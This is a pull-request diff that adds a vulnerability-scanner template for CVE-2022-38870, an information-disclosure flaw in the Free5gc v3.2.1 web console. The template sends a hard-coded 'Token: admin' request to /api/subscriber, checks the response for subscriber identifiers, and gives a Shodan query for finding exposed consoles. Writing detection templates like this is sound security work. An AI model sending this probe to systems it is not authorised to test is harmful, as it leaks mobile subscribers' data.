Merge pull request #5952 from For3stCo1d/CVE-2022-38870

Create CVE-2022-38870.yaml

cves/2022/CVE-2022-38870.yaml

@@ -0,0 +1,34 @@
+id: CVE-2022-38870
+
+info:
+  name: Free5gc - Information disclosure
+  author: For3stCo1d
+  severity: high
+  description: |
+    Free5gc v3.2.1 is vulnerable to Information disclosure.
+  reference:
+    - https://github.com/free5gc/free5gc/issues/387
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-38870
+  metadata:
+    shodan-query: http.title:"free5GC Web Console"
+  tags: cve,cve2022,free5gc,exposure
+
+requests:
+  - raw:
+      - |
+        GET /api/subscriber HTTP/1.1
+        Host: {{Hostname}}
+        Token: admin
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"plmnID":'
+          - '"ueId":'
+        condition: and
+
+      - type: status
+        status:
+          - 200